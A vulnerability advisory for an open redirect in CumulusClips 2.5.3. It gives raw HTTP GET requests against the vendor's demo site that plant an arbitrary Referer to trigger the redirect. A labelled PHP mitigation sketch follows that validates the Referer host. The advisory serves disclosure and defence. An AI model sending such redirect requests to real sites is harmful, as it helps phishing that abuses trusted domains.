# Exploit Title: CumulusClips PHP Script HTTP Referer Header Field Open Redirect Vulnerability
# Date: 2017-10-08
# Exploit Author: Esecurity.ir
# Exploit Author Web Site: http://esecurity.ir
# Vendor Homepage: http://cumulusclips.org
# Version: 2.5.3
# Special thanks: Meisam Monsef - Email: meisamrce@gmail.com - TelegramID: @meisamrce
Exploit :
GET /language/set/en/?action=set
Host: demo.cumulusclips.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Referer: http://www.your-url.com/
Demo :
GET /language/set/en/?action=set
Host: demo.cumulusclips.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Referer: https://google.com/
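
Mitigation sketch (added example, not CumulusClips code and not from the advisory author): validate the Referer before using it as a redirect target. It assumes the language-switch handler redirects back to the Referer value; safeReturnUrl() and the sample Referer values are hypothetical and constructed for illustration.

```php
<?php
// Added example, not CumulusClips code. safeReturnUrl() is a hypothetical helper.
// Assumption: the language-switch handler redirects back to the Referer value.

/**
 * Return a same-site path taken from the Referer, or a fixed local fallback
 * when the Referer is missing, malformed, or points at another host.
 */
function safeReturnUrl(?string $referer, string $siteHost, string $fallback = '/'): string
{
    if ($referer === null || $referer === '') {
        return $fallback;
    }
    // Reject control characters (header injection) and backslashes, which
    // some browsers normalise to forward slashes.
    if (preg_match('/[\x00-\x1F\x7F\\\\]/', $referer)) {
        return $fallback;
    }
    $parts = parse_url($referer);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return $fallback;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return $fallback;
    }
    // Exact host comparison: no suffix, prefix or substring matching.
    if (strcasecmp($parts['host'], $siteHost) !== 0) {
        return $fallback;
    }
    // Emit only path and query, so the Location header stays on this site.
    $path = $parts['path'] ?? '/';
    if ($path === '' || $path[0] !== '/' || strncmp($path, '//', 2) === 0) {
        return $fallback; // "//host" would be read as a protocol-relative URL
    }
    return $path . (isset($parts['query']) ? '?' . $parts['query'] : '');
}

// Constructed sample Referer values; the host is the demo host from the advisory.
$samples = [
    'http://www.your-url.com/',
    'http://demo.cumulusclips.org.your-url.com/',
    'http://demo.cumulusclips.org//your-url.com/',
    'http://demo.cumulusclips.org/videos/?page=2',
];
foreach ($samples as $referer) {
    echo $referer, ' => ', safeReturnUrl($referer, 'demo.cumulusclips.org'), PHP_EOL;
}
```

Only the last sample yields a path other than the fallback; in a handler the returned value would be passed to header('Location: ' . $target).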